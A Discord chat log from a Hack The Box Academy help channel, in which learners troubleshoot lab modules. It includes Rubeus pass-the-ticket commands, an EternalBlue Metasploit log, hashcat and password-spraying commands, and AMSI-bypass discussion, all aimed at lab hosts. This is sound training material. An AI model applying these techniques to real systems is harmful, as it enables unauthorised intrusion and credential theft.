#modules

FML

No, it's not is it lol

it's a 404 not found error; which i also got when running the install command on pwnbox, but an update cleared it up

I just spent 3 hours on the Public Exploits question and ended up finding a hint on google. I feel so wrecked

did you look at the webpage?

lol

Yeah, glanced and saw public key error for some reason

always try the simple things first

that's like rule 0 of this stuff, especially on tier 0 modules like Getting Started

I think my main hangup was because I ran out of time on my first machine, I had the old machine data in RHOSTS

oof

gl though and hh

thank you

it will happen again

definitely messes with the mind. Went down a few rabbit holes that seemed promising. At least I won't forget this one

I was thinking that it seemed a little more advanced for getting started.

yup

overthinking gets ya

sometimes you gotta follow some logical leaps

i.e. reusing passwords

when the lab target has a specified port, should you only focus on that port?

yes

if the target is IP:PORT it's giving you a PUBLIC docker IP and port which is containing the service

this, i believe, is explained in the intro to academy onboarding module

alright I missed that

which explains how academy modules and targets work :3

well that explains why I went down a rabbit hole of a bunch of gobuster directories on just the IP lol

thanks marcielee, you are correct. under docker targets in the intro

https://tenor.com/view/every-time-60percent-60percent-of-the-time-it-works-every-time-anchorman-gif-4630682

This is said an uncountable number of times a day at work

another mental shortcut: if it's a docker target, you're not meant to get a revshell

thats helpful

I was expecting a revshell to find the flag

i already lost man

please don't spoil skill assessments

ok but i did it right and i can't get the flag

Did what right?

• i put spoiler

can u check ur dm ?

Putting spoiler tags do nothing, if your screenshot contains any info you had to search for, you need to redact it

You had to decrypt the hash to get the key

i did

and still can't found anything

try to describe what you want to do and what you have done so far

being a tier 0 module allows you to be a more precise

Did you send the request to the endpoint you got the key to decrypt from?

I just did it and it worked fine for me

yes

can u check ur dm i will send the whole request

Well I just did it and it worked as intended

Do you guys have some tips to copy the TGT ticket in order to use it with `rubeus.exe ptt ticket:{ticket_here} , I usually use Tmux with Linux and it's pretty effecient copying huge block of lines but like with TGT I have to copy line by line the ticket back to the command , holy smokes with the lags from the lab VM's + RDP session, I'm pulling my hair out

you wanna copy from vm to rdp?

I mean when inside the windows VM using Powershell, if there is a way to copy the TGT from the Rubeus.exe output

no, event from the same powershell session

If I copy paste the whole TGT ticket to another Rubeus command, I'm getting powershell error

I have to copy paste the ticket line by line in order to make it work

check ur dm @fathom pendant

save as file

also use /nowrap option if you wanna copy from powershell

Alright sounds good,

Why not just use curl

ngl im kinda confused what ur tryna do like

<@&861185840277487616>

https://tenor.com/view/spongebob-how-many-times-do-we-need-to-teach-you-old-man-slow-thick-gif-12272188

To give more context I was doing a module "Coercing Attacks & Unconstrained Delegation" from "Windows Attacks & Defense " , from there at one point we need to capture the TGT ticket from DC1 with .\Rubeus.exe monitor /interval:1 , this command spits the whole TGT ticket as its output

From there we need to use PS C:\Users\bob\Downloads> .\Rubeus.exe ptt /ticket:doIFdDCCBXCgAwIBBa... to use the ticket in our current session

my issue is to copy the whole TGT ticket to the later command. If I try to copy paste the whole TGT ticket at once , powershell gives me error probably because the copy / paste wasn't properly done. My only solution so far was to copy paste the TGT ticket line by line to the command

which takes a certain amount of time, considering also the input lags from the lab VMs and RDP session on top of it

saving as file is better Rubeus.exe ptt /ticket:myticket.kirbi

if you really want to copy paste ticket make it base64 output and try this Rubeus.exe ptt /ticket:<base64_ticket>

let me ask, is it necessary for an RTO to write a tool like juicy-potato? Or is it ok to just use it?

you should be comfortable with being able to write your own tools, as most tools have been signatured

so not everything will work out the box

depending on the engagement

but what relation does this have to htb academy? :)

also RTO is not the same as a Pentester;
https://www.cobalt.io/blog/red-teaming-vs.-pentesting

Noo 😭💔

https://www.cyderes.com/blog/penetration-testing-vs-red-teaming

5x30

/nowrap might help

it's because powershell is a piece of shit lol if it goes to the next line in powershell, instead of it wrapping like you'd expect in linux where 1 line is spread across 5 if it's long enough, each new line is a CRLF new-line

i learned a few techniques from htb academy, and i wonder if coding tools myself is necessary or not. to add, my goal is rto, not pentester

it's good practice

understanding what makes the exe tick

tks

maldev academy is a good place to learn some stuff

https://maldevacademy.com/pricing

thanks, I've heard about this too

but to steer it back on topic; what has been the most interesting module for you so far

hmm

windows privilege escalation?

i think so..

there are quite a few refs there about windows internal, i feel them quite interesting

https://learn.microsoft.com/en-us/sysinternals/resources/windows-internals

i'm reading it

Next time a question like yours is better for #careers-and-certs 😉

thank you, i will learn from it

Hello, where can I get a walkthrough for EscapeTwo?

There is no walkthrough for an active box.

You can get hints in #1327698295102898246 - but you will need to read and follow instructions from #welcome

could i DM anyone about HTTP Attacks Log Injection?

Thx

sure

Use the /nowrap to be able to copy it. It will generate it without those \n

In CPTS Attacking Enterprise Networks, Lateral Movement, mimikatz (no matter what version including the latest and greates) doesn't seem to be working on MS01 (172.16.8.50)... I have RDP in as ilfserveradm.

can someone help with metasploit module pls? i think something is messed up

Hello all! im new here 🙂

welcome

https://discord.com/channels/473760315293696010/1331199482041335829

already have questions

You should ask your questions here and not make a post there

noted

Name the module and section you're stuck on and ask your question.

hi, I am doing the Intro to Binary Exploitation module, in the Intro to Assembly Language submodule. I am not able to solve the last point of the Skill Assessment, could someone tell me if there is a section for assembler in this channel?

Hello HTB,
So I am using Academy, and learning using the PT Path. The VPN works fine there, I am able to access the IPs in the challenges at end of each module.
Question is, now I thought of doing the "Starting Point" lab in Main Site. But even though the system is connected to VPN, I get "Connect to HTB" in red on the main site. Do i need to download separate VPN key for the Main site, or am i missing some thing. Thanks in Advance !

Is vim always weird about copying all the lines?

Metasploit module/ Modules section

I was trying to copy an id_rsa and it says I yanked x lines but when I go to paste only half the lines paste

So just used cat instead and copied the text that way

Can anyone help me out with Attacking Enterprise Networks - Lateral Movement, priv esc on MS01 172.16.8.50. I've tried everything to priv esc as shown in the example, nothing works, tried reseting the target 3 times already.

Don’t cross post. Also - read and follow #welcome and #rules - after that you will get access to #1330234474801135678

your new profile pic makes me happy every time :)

@fringe trail this is not the apropriate channel. This is for help with Academy modules only.

Read #rules and #welcome

Okay

I am having the same issue... I can privesc to Admin per the pwn.bat file and scheduling but cannot get mimikatz to work...

If the pwn.bat file is not triggering, then save a blank txt file to the specified folder to trigger the execution in that folder.

https://academy.hackthebox.com/module/39/section/417

In the end of this section, the tutorial briefly covers writing custom Ruby code to adapt other scripts to Metasploit. I'm wondering if this is considered in-scope for the exam or not.

Which module is this exactly?
It shows (login to htb academy......).

Which exam... I don't think it is for CPTS, but definitely a nice to know.

Metasploit module, at the end

No, it is not in scope for CPTS.

For AEN Lateral... where you run mimikatz, do you need to start that command prompt with administrator privileges?

I cannot get mimikatz.exe to function properly...

Depends on the account privileges, basically…. Independent of the module

if you do whoami /priv does it list all admin privileges for you ?

net localgroup administrators shows that ilfserveradm is in the local Administrators group

Just tried logging out and back in to no avail...

PS C:\Users\ilfserveradm> whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Ah... no,

How can you be in Admins group and not have all Admin privs?

Maybe try a different tool if mimikatz isn't working.

Yeah... doing that now. Any suggestions?

On the other hand, I am just following the AEN content, so it should work.

you aree not doing it blind ?

Depends on your setup, but nxc is one of the most versatile AD tools that I use.

I was doing it blind until I got to this part...

exactly that, imo CME academy module is a must for cpts, but just my opinion, it streamlines ad so much

well think about how you can get a high intetigrity shell as that user and what may be stopping, they cover it in the modules

Yeah, sorry, I'm going through AEN again so I'm not going to look at the walkthrough.

I took that module... and benefitted greatly... didn't recall that you could dump lsa from CME...

ofc you can, they show it to you in the CME module, it can dump almost anything

Nice.. thank you for that...

nxc smb -h and scroll through the information.

Cool

but its good to know both methods imo, a tool may not work for some reason, I use nxc for most things, but I have notes on how to use local tools tool like mimikatz, rubeus etc too

Doing that now...

Ahhh... and Rubeus

yeah this thing is huge, I went through all modues 2 times, some 3 times and I still forget things

Depends on the sysadm and how the machine is setup
Some stuff will block you from having all the privs (JEA, UAC)

There is a module in GitHub that unlocks the privs

I think AEN mentions it

are you refferring to|| FullPowers|| ?

I think it is. Yes

can anyone help with login brute forcing skills assessment part 2

What issue are you having?

cant answer the first question feel like im going down rabbit holes

ftp ports arent open and cant acces ssh

These services can be configured to run on any port, so I wouldn't get wrapped up in that from an external point of view. Maybe you can banner grab to see what service is running externally?

ssh is open also a http login form although i did try brute forcing it with no success

You can DM what you tried so there are no spoilers.

... learn something new everyday ...

Thanks for that ....

thanks for the advice

imma keep on sparkling ✨

Hello legends,

I am doing the (Introduction to Windows Evasion Techniques) and having some troubles at (Open-Source Software).
I am able to bypass the amsi on the lab with amsi patch, but I still get this message when trying to load Seatbelt in memory.

Aren't they supposed to be PS scripts?

You are able to run txt in memory, I changed the extension to ps1 to make sure it was not affecting but I get the same error message.

Well your errors provide some information, so I'd start there.

This is not something we do here @craggy rain

is it against group rules?

It's illegal

If after reworking this, if you can't get it worked out, you can DM and chat about some things.

Alright

my friend 's phone got lost. The police are not helping. Sry about asking..🚶

There is nothing we can do

and anyone dm'ing you claiming otherwise is trying to scam you

Well that was a freaking forehead slapper! Run the shell as Administrator....! WTF!!!! I am better than that! Getting tired I guess.

you brought it up here, why didn't you just try? Might be a sign to take a break

I thought I did to no avail... but when I tried again it worked. I probably screwedup the first time around.

Right!!? Feel like an a$$ fter wasting all that time...

don't beat yourself up, this stuff happens to everyone. Breaks and being kind to yourself are underestimated

if you want a positive spin on it, it's something you probably won't forget anytime soon :) like me with password reuse...

Shootout to @gray yacht thanks for the help brother!

Is DACL 2 supposed to be saying to use Gabriel and not Martha? There's no path from Gabriel to PCTEST001 but there is one from Jeffry > Martha > PCTEST001.

hello everyone, question about LDAP in Attacking Common Applications, how are we sure about the process of login if it's realy ldap (only with nmap?) ? and there is tool to test other than ldapsearch you recommend ? tools to try ldap injections too. Thx !

hi everyone silly question but if there is question asking me to ssh to user xyz and then password is "" it means that there is no password right? and I just need to hit enter. Don't know why but I can't ssh for some reason and it drives me crazy.

which module/section ?

In introduction to threat hunting on hunting for stuxbot can anyone help me understand the third question??

Which is need to find the popular hacking tool this code derives

excuse me, there is an error in one module

The module is footprinting, section NTS

#1234357888114364508

Where can I get more info on the CyberHelmets

https://cyberhelmets.com

Can anyone help me, Attacking common applications, Attacking Wordpress. I have found the user and its correct, but have been bruteforcing for 10 minutes and still no password found. Am I impatient or did I do something wrong?

rockyou is not meant to be used for brute forcing, it was meant for password cracking.
There're a lot of good password wordlists for brute forcing, like dark web 2023 top 100, or fasttrack, etc.
I would say try those instead.

I think the module used rockyou, so either try those for a possibly quicker results, or just wait until rockyou finds you the right password.

I tried fasttrack.txt, 10million-top100 and darkweb2017-top100.txt. None of them work. I think this section is unnecessarily long.

Thank you

if i buy a module i will retain access to it even if my subscription runs out right ?

Yes

ok

Well, HTB sometimes have these kind of modules.
Remember, part of being a hacker is having a lot of patience, without it, you won't get very far with the field.

You're right bro, thanks for putting it in that perspective.

You're mostly welcome.
if you sometimes run out of patience, that's ok, sometimes it happens, don't let this bring you down.
Just move on and try having more patience next time.

hey bro!

what did you do regarding the ODAT for footprinting?

Try doing another subdomain/vhost enum for web1337.inlanefreight.htb, and after that if you need any help let me know.

what about it?

In the section "Attacking Domain Trusts - Child -> Parent Trusts - from Linux" during the final exercise the raiseChild.py script automates the discovery of the parent domain's administrator's hash. What is the most effective method for enumerating this manually? Would it be possible to use a golden ticket manually with secretsdump.py or nxc?

when I run responder I get all of these errors is this normal? [!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting TCP server on port 5985, check permissions or other servers running.
[!] Error starting TCP server on port 3389, check permissions or other servers running.
[!] Error starting TCP server on port 135, check permissions or other servers running.
[!] Error starting TCP server on port 445, check permissions or other servers running.
[!] Error starting TCP server on port 139, check permissions or other servers running.
[!] Error starting TCP server on port 88, check permissions or other servers running.
[!] Error starting TCP server on port 1433, check permissions or other servers running.
[!] Error starting TCP server on port 21, check permissions or other servers running.
[!] Error starting TCP server on port 110, check permissions or other servers running.
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting TCP server on port 389, check permissions or other servers running.
[!] Error starting TCP server on port 25, check permissions or other servers running.
[!] Error starting TCP server on port 587, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting TCP server on port 53, check permissions or other servers running.
[!] Error starting TCP server on port 143, check permissions or other servers running.

I don't wanna kill all the pid's on the port cause last time I killed my connection to the box

you need to run it as sudo

ah

otherwise it cant listen on those ports

no I did that

sudo responder -I tun0

sudo impacket-smbserver share ./ -smb2support File "/usr/lib/python3.11/socketserver.py", line 456, in init
self.server_bind()
File "/usr/lib/python3.11/socketserver.py", line 472, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use

You guys need to update attacking common services. I tried attacking ftp and after like the 5th reset I got an open port. This has been a problem for years from what I can see. Also, idk what do to do for port 1443

Well obviously that isn’t gonna work

You just run responder on 445 snd then try to start a smb server on that port

Hi, I have a question on the skills assessment of the (command injection module)[https://academy.hackthebox.com/module/109/section/1042] . I succeded it and for the fun I downloaded the code source. I found the function vulnerable in it, but I don't understand something. In the array of caracters that are supposed to be filtered by strpos there are two caracters I use in my requests. So, I was wondering Why muy requests weren't denied ? I blurred a lot because, I don't want to be ban 😉
The first screenshot, is the code execution and the second one is the filtering in place.

Hi, I'm working on Password Attacks - Protected Files and I'm having troubles starting.

I can't figure out how to access the target machine. The cracked password isn't listed, so I'm using the previously known one, but that doesn't work.

Am I doing something wrong?

hello folks

working on Command Injection

Bypassing Blacklisted Characteres

I am pretty sure that my payload should work

can I review with someone? I do not want to spoil the thing

Did you identify any open ports and services running?

Sure you can DM.

Thank you!

Learned Lesson: gotta increase Burp's font, lol

no, i can try that

Hello! Noob here, lol.
I have started on the Information Security Foundations Module and I am really excited in starting on this path. However, I have a question that may come off a bit ignorant on my end. I am on the Setting Up Section of the modules. Would I need to follow their instructions when it comes to the Windows VM setup, and if so, I would also have to follow the Windows Host (My PC) instructions as well?

did you find it? im soo stuck

The setting up is more of a reference than a hard guide

Having a windows vm can be helpful to test things, but isn't strictly necessary

Okay, that helps ease the weight off my shoulders a bit, thank you.

Can you give me a nudge with this, im having issues with it too. I have it all deobfuscated, except one var. not really sure how to proceed.

I need a nudge for CME module SA, find username and password. Found the ip of the DC01 which has null session but i can only rid brute force and get 4k usernames. Guessing common password didnt yield anytihng

yo awoken

did the exploit work with you? Mine said target isn't vulnerable.

Anyone available for a nudge on DACL ATTACKS II last question?

What nudge do you need? It's pretty straightforward

@dapper moth well I suck so can I dM?

Haha... You don't suck, mate
It's ok to be a little lost sometimes

sure

Hello, anyone who can help me with

Shells & Payloads - Infiltrating Windows

PROBLEM: Using the ms17_010_psexec with windows/meterpreter/reverse_tcp payload. There is a successful connection within the target machine
....

• Selecting PowerShell target
• Executing the payload
• Service start times out, OK if running a command or non-service executable...
• Exploit completed, but no session was created

THEORY: My guess was the payload, so I tried every windows/shell/reverse payload but to no avail they also don't work. I only need to find the flag to finish this part.

try a different exploit

there's like a handful

also make sure your rhost is correct

and lhost

https://dontasktoask.com

💀

bro no way lol

messages like this give me life man

lmfao

thatll teach em

I haven't tried this one since I stick way too much on the guide. Mb for the noob mistake, and also huge thanks

#rules

pg-13

<@&861185840277487616>

ty

<3

Dam

2 fast

https://tenor.com/view/f5-refresh-reload-gif-15071315

I am having Hashcat issues. I am working on the Footprinting module, IPMI section. I've tried a few variants of cracking the hash I got using the Metasploit module include brute and using the provided wordlist and nothing. Any thoughts?

provided wordlist should work; you don't use the mask part

hashcat --username -m 7300 out.hashcat -a 0 <wordlist>

did you make sure to have the msfconsole tool output to hashcat format?

don't share the hash; spoiler text does nothing

since anyone can click on it

did you try with just the second part of the hash?

gotcha

i did not

I just ran it with the following variations: removing all but the hash and removing all but the part of the hash after the ":". Would the mode still be 7300?

Yes

Ok so I ran -m 7300 -a0 against the whole hashcat output and just the hash (part 1:part2) against the footprint wordlist and i get "exhausted". The same technique against the second half gives me a spearator unmatched error.

hold on

what about rockyou?

I've not tried that but can give it a go

Bingo. That worked. Thank you.

^

Hey I'm not sure if its me or a bug, but I'm doing the Linux Priv esc module and am on the kernel exploit skills assessment. Found the correct exploit, compiled it, executed it, and have a root shell. However, when I try to do anything that would require root priveleges, I get permission denied. All the folders that were owned by root are owned by "nobody" when I'm in the root shell. Any ideas?

Update: Just tried also different exploit, even the exploit outside ms17_010 but the issue is still.

Anyways, here's a sample log for the module windows/smb/ms17_010_eternalblue

[*] 10.129.86.146:445 - Connecting to target for exploitation. [+] 10.129.86.146:445 - Connection established for exploitation. [+] 10.129.86.146:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.129.86.146:445 - CORE raw buffer dump (34 bytes) [*] 10.129.86.146:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.129.86.146:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 31 34 33 016 Standard 143 [*] 10.129.86.146:445 - 0x00000020 39 33 93 [+] 10.129.86.146:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.129.86.146:445 - Trying exploit with 22 Groom Allocations. [*] 10.129.86.146:445 - Sending all but last fragment of exploit packet [*] 10.129.86.146:445 - Starting non-paged pool grooming [+] 10.129.86.146:445 - Sending SMBv2 buffers [+] 10.129.86.146:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.129.86.146:445 - Sending final SMBv2 buffers. [*] 10.129.86.146:445 - Sending last fragment of exploit packet! [*] 10.129.86.146:445 - Receiving response from exploit packet [+] 10.129.86.146:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.129.86.146:445 - Sending egg to corrupted connection. [*] 10.129.86.146:445 - Triggering free of corrupted buffer. [-] 10.129.86.146:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.129.86.146:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.129.86.146:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Exploit completed, but no session was created.

make sure all your variables are set properly

no

bruhhh

yes

quick question. If an exploit module could successfully do this (well no session was created still)

[+] 10.129.86.146:445 - Overwrite complete... SYSTEM session obtained! [*] 10.129.86.146:445 - Selecting PowerShell target [*] 10.129.86.146:445 - Executing the payload... [+] 10.129.86.146:445 - Service start timed out, OK if running a command or non-service executable... [*] Exploit completed, but no session was created.

Why can't I footprint the service using smbclient, smbmap, rpcclient, crackmapexec.
Here is an example output from crackmapexec

crackmapexec smb 10.129.86.146 --shares -u '' -p '' SMB 10.129.86.146 445 SHELLS-WINBLUE [*] Windows Server 2016 Standard 14393 x64 (name:SHELLS-WINBLUE) (domain:SHELLS-WINBLUE) (signing:False) (SMBv1:True) SMB 10.129.86.146 445 SHELLS-WINBLUE [+] SHELLS-WINBLUE\: SMB 10.129.86.146 445 SHELLS-WINBLUE [-] Error enumerating shares: STATUS_ACCESS_DENIED

does that exploit even need valid creds?

1. there is more than one eternalblue exploit. 2) your credentials (anonymous) doesn't have permissions to view the share.

@fathom pendant @safe star Thanks again! You all are champs 🙂

Not sure if this is the place to ask but I’m trying to learn pen testing I signed up for HTB today and I did the intro to infosec and was planning to do the intro to pen testing next, anyone that started pen testing on HTB did you do this or did you just enroll in the “pen testing path” thing ?

The pentesting path contains the modules that are required to complete which allow you to take the CPTS exam. so people usually do that path for that I think, but you can do whatever modules that look interesting to you.

what is helpful is if you don't know a technology like Linux, there's a Linux module you can take then go back to the pentest path

Sounds good thanks!

Also do you guys take notes on the modules you guys do or just do them lol might be a dumb question

most definitely take notes

writing things down helps commit it to memory

Guys, i have am i the only one finding pings higher to the machines today?

they used to be for me 70s

and now 115s

nvm

Hello everyone, I'm currently working on the Login Brute Forcing module's skill assessment part 1 at HTB. I've been trying to use Hydra to attack as specified in the text file provided. Could anyone share some advice or tips on how to approach this?

How the modules are done is full of information and cant write everything down. I just go in, read a little and do the content

I'm currently doing CDSA , labs / VMs are lagging so much, I'm struggling pretty hard to focus because of frustration , is it lagging also for you guys ?

the worst is when I gotta do RDP session on top of a VM, the lag is huge

try reaching out to support to troubleshoot the VPN connection

ok

yes, i think it was the worst with events logs and attack & defense modules

I don't want to hate or anything, the content is quite good, I really like HTB Academy no doubt, but man when I gotta do the lab, it's a huge pain

Trying so other vpn's and also trying tcp instead of udp, will see

came back to that module after the next 10 😂

😢

watching it close with me doing nothing was my final straw

Few minutes ago I was having "the trust relationship is not working" something like that, between the lab Kali and the Windows web server, did you ever get that message ?

when I initiate RDP, it kicks me back to the login screen, talking about trust relationship between the 2 machines not working

yeah i had that but it didnt kick me out tho

which part is that

PKI-ESC1

They ask me to connect first to the kali lab machine and from there doing a RDP to WS001 windows web server, but when I do RDP, I cant login and im stuck at the WS001 login screen with a msg talking about relationship not working between the 2 machines

yeah i didnt get that this time

try restarting

yep, doing it rn

Same issue, well I'll see tomorrow, I'm done with this for today

scammer

@supple tiger
ban him , he's scammer

to crack aes 256hash we get from keytab file which module is used in hashcat

i think it is module 19700, "Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96)"

you can find hashcat modules from here https://hashcat.net/wiki/doku.php?id=example_hashes

hey guys whats up i dont know if the question belongs here but i will ask... i have a lot of problem wit connectin to the machines and labmachines. When i do a nmap scan which should not take more 2-3 minutes, take me like 20-30 min. aner first he scann fast and show me 60-70 % after 1 min then he go slower and slower. Some machines i can not even ping and he after he gives me no feedback.

nmap -sC -sV 10.129.95.187 -p- -oN Atnmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 03:19 CST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.55% done; ETC: 03:21 (0:01:26 remaining)
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.45% done; ETC: 03:21 (0:00:58 remaining)
Stats: 0:01:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 87.24% done; ETC: 03:21 (0:00:15 remaining)
Stats: 0:02:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 88.33% done; ETC: 03:22 (0:00:16 remaining)
Stats: 0:04:32 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 89.51% done; ETC: 03:24 (0:00:32 remaining)
Stats: 0:06:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.06% done; ETC: 03:27 (0:00:43 remaining)
Stats: 0:06:34 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.08% done; ETC: 03:27 (0:00:43 remaining)
Stats: 0:06:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.08% done; ETC: 03:27 (0:00:43 remaining)
Stats: 0:07:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.32% done; ETC: 03:28 (0:00:48 remaining)
Stats: 0:11:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.40% done; ETC: 03:32 (0:01:04 remaining)
Stats: 0:17:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.00% done; ETC: 03:38 (0:01:17 remaining)

try doing a tcp scan

but why a day before was function and when i wanna continue not anymore

sometimes it's silly like that

it doesn't look like it's getting caught on anything though as progress is happening

you can also adjust stuff like --min-rate and --max-retries per the nmap documentation

thaanks

I'm currently doing the Password Attacks - Network Services section, and I'm stuck at the first question initial user enumeration part:

"Find the user for the WinRM service and crack their password."

So I know that the username for the WinRM service ||is the first one on the list||. But I'm confused as to where this is implied.

Am I missing some way to enumerate users without also brute-forcing passwords?

nope

gotta try every username and password combo

this is why people say this module takes ages

That's really stupid.

yeah, it definitely wastes a lot of time, but what can you do ¯_(ツ)_/¯

Also, I did login via WinRM and enumerated local users, added them to a file, then tried another spray for ssh, but didn't get a result.

Are services inside their own VMs, so they don't share the same usernames?

nope they're all on the same VM; they're just configured in a way to only allow specific logins from specific users

Wait, so that means the users I got from get-localuser should be valid for other services, right?

ye

the users can still exist; just the services are configured to only allow logins from specific ones

i.e. setting up an authenticated ftp server where there's like 20 local users, but only one that you can log in with

User list and password list is provided under resources

This doesn't explain why Hydra didn't get a valid hit when I did a brute force based on the new userlist

because some services hydra really sucks at enumerating

nxc is the other tool that's helpful here

I brute forced ssh though

(note the module uses cme/crackmapexec, netexec is the replacement for it)

Yeah, I got the WinRM user via nxc

like i said; some services hydra just is stupid about

that's just how it is

and there's some things that nxc will be stupid about

¯_(ツ)_/¯

multiple tools exist for the sole reason that sometimes a tool just doesn't wanna work right

If I remember correctly hydra can also have issues with SMB depending on version, while nxc will work fine.

But hydra will give you an error

try spraying those users on smb and rdp

with some services it might be possible to allow authentication from users that don't actually exist

that shouldnt be the case with smb though, so thats why it would be interesting to try that

user may exist but they aren't configured to log in

smb absolutely can be blocked lol

some config shenanigans

unless i misunderstood im pretty sure they mean they tried every username on the box and every password in the list

¯_(ツ)_/¯

what's good to note is that each service has their own user

so once you get one, you should remove it from the list

@honest crane this is the case.. right?

also password attacks is pretty shitty at letting you know when to use the mutated wordlist vs the regular wordlist

but i believe that section is before mutated

if you had to use mutated on that section no one would have cpts yet

they'd all be stuck brute forcing winrm

It teaches patience and persistence if nothing else.

I used the users I gathered from get-localuser (which are 6-7 iirc) and the provided password list for Hydra SSH brute force

imo just use the default list

what they did was very clever

it is

but just in case of some shenanigans™️

Didn't you say that the users I found are legit?

other suggestions would be: resetting target

waiting at least 5-10 minutes before attacking to ensure services have properly started up

try smb @honest crane, i think with ssh you can login with users that don't exist, but smb is like... internal to windows or something, so users on smb should exist on the actual box as a local account.

You can use this technique when attacking domain controllers/AD etc to get domain users but its a bit beyond what the module is expecting atm, best to use the defaults

if not then there are some shenanigans indeed 🧐

I did got three hits on smb, now that I checked

is one of them the original user you logged into winrm as?

Not sure why would I use the 200-long userlist, when I have all the users..

Yeah

Ed: Wait nvm, it's three + the winrm user

if you want to clean up the output a bit; pipe the nxc output to grep -v '[-]'

that way you only get the [+] messages

I wish there was an option for that, losing colors is lame

I like your method and think its a good way to approach it though the module is notorious for taking a long time so if you end up missing something from the default list for whatever reason you are going to have a bad time.

But it might work out and you save a load of time so who knows 😂

i think there's a an option for grep to keep colors

¯_(ツ)_/¯

it's something similar to what i did, instead i just looked at C:/Users/

and for the linux host i looked at /home/

I already got the SMB flag, we'll see

Hopefully it goes smoothly for you, I still have PTSD from that module though I was very inexperienced when I did it.

How long did it took you?

2 days for the full module, Not sure how many hours but minimum 16 I guess.

reccomended time is 8 hours

i dont know anyone who has done it within that time

There was another one that was similar, Can't remember if it was attacking thick client apps or something else... rough

the recommended time for common apps module was prior to the addition of the thick client sections

(fuck java)

welp

im on intro into command line

the question says

Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.

i found the file and i found the flag

and it still says answer is wrong

are you 100% sure there are no trailing or leading spaces in the flag that shouldnt be there?

So i'm on the footprinting hard lab, and I can't seem to SSH as User Tom, using the private key I enumerated from the SNMP server

nope i checked it countless times

I even tried putting the path to the private key in the ssh_config file

ssh doesn't automatically detect that you have a private key, you should specify it with -i

i.e.

ssh user@inlanefreight.htb -i id_rsa

you also havent specified a user in ssh, im pretty sure its necessary

I've already used that, same error

log in as a specific user with user@inlanefreight.htb

Did you changed the permissions?

yeah chmod 600 <file name>

maybe just try resetting the target, you already know how to do it so it should be quick

could you show the full ssh debug output

Try to see if there's a new empty line at the end of the key

I think it's a copying issue

unless its in the default directory

yeah sure

Let me try something what you suggested

then i'll show you the debug

@unborn summit

that's all of it?

yeah

the line above is just the command i used

you tried what @honest crane suggested?

empy line hmm wait let me check

hmm could be

there's plenty of spaces

how do I copy it correctly then

yeah thats scrambled

I just got it straight from the server

when you cat the key on the server what output shows up?

shows up fine

try cat -v

it's the same??

this is on the server? not on your pwnbox/vm?

no I'm not on any server

this is on pwnbox

oh i thought it would show the other characters

it shows the full file

private keys should be wrapped in ------ BEGIN PRIVATE KEY ------

and

------- END PRIVATE KEY-------

im guessing you only copied the middle portion

Ahhhhh

Yah

Well the more you know

its how ssh knows which algorithm the private key is associated with

Oh my god that worked

thanks, now i'll do the rest of the lab, so close!!!!

probs a database i need to find, so i can find the htb username

🥸

Ok cool thank you guys, I've finished hahahaha

tried everything

did you ever figure this out? i am curious why this happened as well

Nope

let me priv esc

help pls

😬

@leaden island do not abuse the red role for help

sorry but im raging rn 😭

My idea is that maybe strpos $REQUEST doesn't work due to url encoding but I'm truly not confident in it

sometimes the hint can give useful info about how the flag should be formatted, try looking at it

You just notified all admins/moderators/staff for getting help with a module question. Please don't do it again

i thought its built for that sry

the hint just leading how to find the file

Have you checked if there are spaces at the front/back?

im rly sorry

yeah no spaces

ill do some testing

Maybe you shouldn't decode it

Do you have the source code ? I can give to you

i dont have the code, if you could send that would be great

It asks you for the flag that you found in the file - not to decode it 😅

correct

thats devious

rly thanks i was about to destroy the laptop

who wouldnt see base64 and instantly decode it 🤔

yeah true

expensive module then

i think the hint should be "do not decode"

haha

VM Setup
Before installing our ParrotOS Security operating system, we need to create a VM (in VMware Workstation in this example). Here we also specify which installation file will be used for the operating system (.iso file).

in this do i need to install parrot os security ? from its site for vmware and add it in vmware and run?

stucked here

Anyone can help me dm me

